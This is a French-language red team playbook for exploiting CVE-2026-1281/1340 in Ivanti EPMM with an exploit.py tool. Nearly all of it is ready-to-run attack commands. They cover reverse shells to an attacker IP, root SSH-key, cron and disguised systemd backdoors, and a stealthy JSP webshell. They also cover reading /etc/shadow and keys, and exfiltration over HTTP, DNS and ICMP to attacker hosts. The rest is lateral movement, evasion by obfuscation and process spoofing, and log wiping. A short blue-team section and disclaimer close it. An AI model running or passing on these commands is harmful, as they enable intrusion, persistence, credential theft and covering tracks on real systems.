# Guide Opérationnel Red Team - CVE-2026-1281/1340

## 🎯 Quick Start

### Installation rapide
```bash
git clone <repo>
cd CVE-2026-1281_PoC
pip3 install -r requirements.txt
chmod +x *.py *.sh
```

### Test initial de vulnérabilité
```bash
# 1. Vérifier l'accessibilité
python3 exploit.py -t https://target.example.com -c

# 2. Confirmer RCE
python3 exploit.py -t https://target.example.com --test-rce

# 3. Validation complète automatisée
python3 validate.py -t https://target.example.com
```

## 🔥 Scénarios d'Exploitation Red Team

### Scénario 1: Initial Access rapide

**Objectif:** Obtenir un accès initial sur le système EPMM

```bash
# 1. Listener
nc -lvnp 4444

# 2. Reverse shell
python3 exploit.py -t https://target.example.com \
    --reverse-shell 10.10.14.5:4444
```

**Post-exploitation immédiate:**
```bash
# Sur le reverse shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
id && whoami
uname -a
```

### Scénario 2: Persistence stealthy

**Objectif:** Maintenir l'accès même après reboot

```bash
# 1. Backdoor SSH
python3 exploit.py -t https://target.example.com \
    -x "mkdir -p /root/.ssh && chmod 700 /root/.ssh"

python3 exploit.py -t https://target.example.com \
    -x "echo 'ssh-rsa AAAA...votre_cle_publique' >> /root/.ssh/authorized_keys"

# 2. Cron job persistant (callback toutes les 5 minutes)
python3 exploit.py -t https://target.example.com \
    -x "echo '*/5 * * * * /bin/bash -c \"bash -i >& /dev/tcp/10.10.14.5/4444 0>&1\"' | crontab -"

# 3. Systemd service
# Créer d'abord le service localement, puis le déployer
cat > backdoor.service << 'EOF'
[Unit]
Description=System Monitoring Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/10.10.14.5/4444 0>&1; sleep 300; done'
Restart=always
RestartSec=30

[Install]
WantedBy=multi-user.target
EOF

# Encoder en base64 pour transfert
cat backdoor.service | base64 -w0 > backdoor.b64

# Déployer
python3 exploit.py -t https://target.example.com \
    -x "echo '$(cat backdoor.b64)' | base64 -d > /etc/systemd/system/sysmon.service"

python3 exploit.py -t https://target.example.com \
    -x "systemctl enable sysmon.service && systemctl start sysmon.service"
```

### Scénario 3: Webshell pour accès web

**Objectif:** Déployer un webshell JSP pour accès via HTTP

```bash
# Option 1: Webshell automatique
python3 exploit.py -t https://target.example.com --webshell

# Accès
curl -k "https://target.example.com/mi/webshell.jsp?cmd=id"

# Option 2: Webshell personnalisé plus furtif
python3 exploit.py -t https://target.example.com \
    -x "echo '<%@ page import=\"java.io.*\" %><% String c=request.getParameter(\"x\");if(c!=null){Process p=Runtime.getRuntime().exec(c);InputStream i=p.getInputStream();byte[] b=new byte[1024];int l;while((l=i.read(b))>0)out.write(new String(b,0,l));} %>' > /mi/tomcat/webapps/ROOT/health.jsp"

# Accès (plus discret avec paramètre "x")
curl -k "https://target.example.com/health.jsp?x=id"
```

### Scénario 4: Reconnaissance interne

**Objectif:** Mapper le réseau interne via EPMM

```bash
# 1. Découvrir les interfaces réseau
python3 exploit.py -t https://target.example.com \
    -x "ip a > /tmp/network.txt && cat /tmp/network.txt"

# 2. Scanner le réseau interne (ping sweep)
python3 exploit.py -t https://target.example.com \
    -x "for i in {1..254}; do ping -c 1 -W 1 192.168.1.\$i 2>&1 | grep 'bytes from' >> /tmp/alive.txt; done"

# 3. Récupérer les résultats via exfiltration DNS
python3 exploit.py -t https://target.example.com \
    -x "cat /tmp/alive.txt | while read line; do nslookup \$(echo \$line | tr ' ' '-').attacker.com; done"

# 4. Scanner les ports courants
python3 exploit.py -t https://target.example.com \
    -x "for ip in \$(cat /tmp/alive.txt | awk '{print \$4}' | tr -d ':'); do for port in 22 80 443 445 3389; do nc -zv -w 1 \$ip \$port 2>&1 | grep succeeded >> /tmp/ports.txt; done; done"
```

### Scénario 5: Pivoting via Sentry

**Objectif:** Utiliser Ivanti Sentry pour accéder au réseau interne

```bash
# 1. Analyser la configuration Sentry
python3 exploit.py -t https://target.example.com \
    -x "find /mi -name '*sentry*' -type f 2>/dev/null > /tmp/sentry_files.txt"

python3 exploit.py -t https://target.example.com \
    -x "cat /mi/sentry/config.xml > /tmp/sentry_config.xml 2>/dev/null || echo 'No Sentry config'"

# 2. Identifier les systèmes accessibles via Sentry
python3 exploit.py -t https://target.example.com \
    -x "grep -E 'host|server|ip|url' /tmp/sentry_config.xml > /tmp/internal_systems.txt"

# 3. Tester la connectivité interne
python3 exploit.py -t https://target.example.com \
    -x "curl -k https://internal-sharepoint.corp -o /tmp/internal_test.html 2>&1"
```

### Scénario 6: Credential Harvesting

**Objectif:** Extraire les credentials stockés

```bash
# 1. Rechercher fichiers de configuration
python3 exploit.py -t https://target.example.com \
    -x "find /mi -type f \( -name '*.conf' -o -name '*.cfg' -o -name '*.properties' -o -name '*.xml' \) 2>/dev/null > /tmp/configs.txt"

# 2. Rechercher mots de passe
python3 exploit.py -t https://target.example.com \
    -x "grep -rn -E 'password|passwd|pwd|secret|key|token' /mi/config/ 2>/dev/null > /tmp/passwords.txt"

# 3. Extraire les hashes shadow
python3 exploit.py -t https://target.example.com \
    -x "cat /etc/shadow > /tmp/shadow.txt 2>/dev/null || echo 'Permission denied'"

# 4. Rechercher clés SSH
python3 exploit.py -t https://target.example.com \
    -x "find / -name 'id_rsa' -o -name '*.pem' -o -name '*.key' 2>/dev/null > /tmp/keys.txt"

# 5. Exfiltrer via HTTP POST
python3 exploit.py -t https://target.example.com \
    -x "tar czf /tmp/creds.tar.gz /tmp/passwords.txt /tmp/shadow.txt /tmp/keys.txt 2>/dev/null && curl -X POST -F 'file=@/tmp/creds.tar.gz' http://10.10.14.5:8000/upload"
```

### Scénario 7: Data Exfiltration

**Méthode 1: HTTP Exfiltration**
```bash
# Serveur HTTP pour recevoir les données
python3 -m http.server 8000

# Exfiltrer via POST
python3 exploit.py -t https://target.example.com \
    -x "tar czf - /mi/data/sensitive/ 2>/dev/null | curl -X POST --data-binary @- http://10.10.14.5:8000/data.tar.gz"
```

**Méthode 2: DNS Exfiltration (stealthy)**
```bash
# Utiliser un serveur DNS custom (ex: dnscat2, iodine)
python3 exploit.py -t https://target.example.com \
    -x "cat /mi/data/sensitive.txt | base64 | while read line; do nslookup \$line.exfil.attacker.com; done"
```

**Méthode 3: ICMP Exfiltration**
```bash
# Listener ICMP
tcpdump -i eth0 icmp -w icmp_exfil.pcap

# Exfiltrer via ICMP
python3 exploit.py -t https://target.example.com \
    -x "cat /mi/data/sensitive.txt | xxd -p | while read line; do ping -c 1 -p \$line 10.10.14.5; done"
```

### Scénario 8: Lateral Movement

**Objectif:** Se déplacer vers d'autres systèmes

```bash
# 1. Copier les outils de post-exploitation
# Sur votre machine
python3 -m http.server 8000

# Sur la cible
python3 exploit.py -t https://target.example.com \
    -x "wget http://10.10.14.5:8000/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh"

# 2. Scanner SMB sur le réseau interne
python3 exploit.py -t https://target.example.com \
    -x "for ip in \$(cat /tmp/alive.txt); do smbclient -L \$ip -N 2>&1 | grep Sharename >> /tmp/smb_shares.txt; done"

# 3. Tenter Pass-the-Hash si credentials trouvés
python3 exploit.py -t https://target.example.com \
    -x "pth-winexe -U 'DOMAIN/user%hash' //192.168.1.50 cmd.exe"
```

## 🛡️ Evasion & OPSEC

### Techniques d'évasion

**1. Obfuscation des payloads**
```bash
# Base64 encoding
CMD="whoami"
CMD_B64=$(echo "$CMD" | base64)
python3 exploit.py -t https://target.example.com \
    -x "echo $CMD_B64 | base64 -d | bash"

# Hex encoding
CMD="id"
CMD_HEX=$(echo "$CMD" | xxd -p)
python3 exploit.py -t https://target.example.com \
    -x "echo $CMD_HEX | xxd -r -p | bash"
```

**2. Randomisation des noms de fichiers**
```bash
# Utiliser des noms de fichiers légitimes
python3 exploit.py -t https://target.example.com \
    -x "touch /tmp/.systemd-update-check"

# Ou générer des noms aléatoires
RANDOM_NAME=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 8)
python3 exploit.py -t https://target.example.com \
    -x "touch /tmp/.$RANDOM_NAME"
```

**3. Cleanup automatique**
```bash
# Commandes qui s'auto-détruisent après exécution
python3 exploit.py -t https://target.example.com \
    -x "(id > /tmp/output.txt && cat /tmp/output.txt && rm /tmp/output.txt) &"
```

**4. Utiliser des processus légitimes**
```bash
# Spawner depuis un processus légitime
python3 exploit.py -t https://target.example.com \
    -x "bash -c 'exec -a \"[kworker/0:0]\" bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'"
```

### Bonnes pratiques OPSEC

1. **Timing des requêtes**
   - Espacer les requêtes (sleep entre commandes)
   - Opérer pendant les heures de travail normales
   - Éviter les scans massifs

2. **Cleanup après exploitation**
```bash
# Script de cleanup
python3 exploit.py -t https://target.example.com \
    -x "rm -f /tmp/*.txt /tmp/*.sh; history -c"

# Nettoyer les logs (si possible)
python3 exploit.py -t https://target.example.com \
    -x "echo '' > /var/log/httpd/https-access_log"
```

3. **Rotation des C2**
   - Utiliser plusieurs IPs pour callbacks
   - Changer les ports régulièrement
   - Utiliser des redirecteurs

## 📊 Reporting et Documentation

### Capture de preuves

```bash
# 1. Screenshots de commandes réussies
python3 exploit.py -t https://target.example.com \
    -x "id && hostname && ip a" 2>&1 | tee evidence_rce.txt

# 2. Exporter rapport de validation
python3 validate.py -t https://target.example.com -o validation_report.json

# 3. Collecter les IOCs pour le rapport
bash detect_compromise.sh > ioc_report.txt
```

### Template de rapport Red Team

```markdown
## CVE-2026-1281/1340 Exploitation

**Cible:** target.example.com
**Date:** [DATE]
**Opérateur:** [NOM]

### Résumé Exécutif
- [X] Initial Access obtenu
- [X] RCE confirmé
- [X] Persistence établie
- [X] Credentials exfiltrés

### Détails Techniques
- **Vecteur d'attaque:** CVE-2026-1281 (Bash Arithmetic Expansion)
- **Endpoint exploité:** /mifs/c/appstore/fob/
- **Privilèges obtenus:** root

### Impact Business
[Décrire l'impact...]

### Recommandations
1. Appliquer immédiatement les patches RPM d'Ivanti
2. Isoler les systèmes EPMM du réseau
3. Audit complet des systèmes potentiellement compromis
4. Rotation des credentials
```

## 🚨 Incident Response (Blue Team)

Si vous découvrez que votre EPMM a été compromis :

```bash
# 1. Exécuter le script de détection
sudo bash detect_compromise.sh

# 2. Isoler le système
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

# 3. Créer un backup forensique
dd if=/dev/sda of=/mnt/backup/epmm_forensics.img bs=4M

# 4. Analyser les logs
grep -E "gPath|theValue|/mifs/c/(aft|app)store" /var/log/httpd/https-access_log

# 5. Contacter votre CSIRT
```

## 🔗 Ressources supplémentaires

- **CERT-FR Alert:** https://www.cert.ssi.gouv.fr/alerte/CERTFR-2026-ALE-001/
- **Watchtowr Analysis:** https://labs.watchtowr.com/
- **Ivanti Advisory:** https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340

## ⚖️ Legal Disclaimer

**IMPORTANT:** Ces techniques sont fournies uniquement pour :
- Évaluations de sécurité autorisées
- Opérations Red Team légitimes
- Recherche en sécurité responsable

L'utilisation sans autorisation explicite est illégale et contraire à l'éthique.

---

**Auteur:** Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist  
**Date:** Février 2026  
**Version:** 1.4
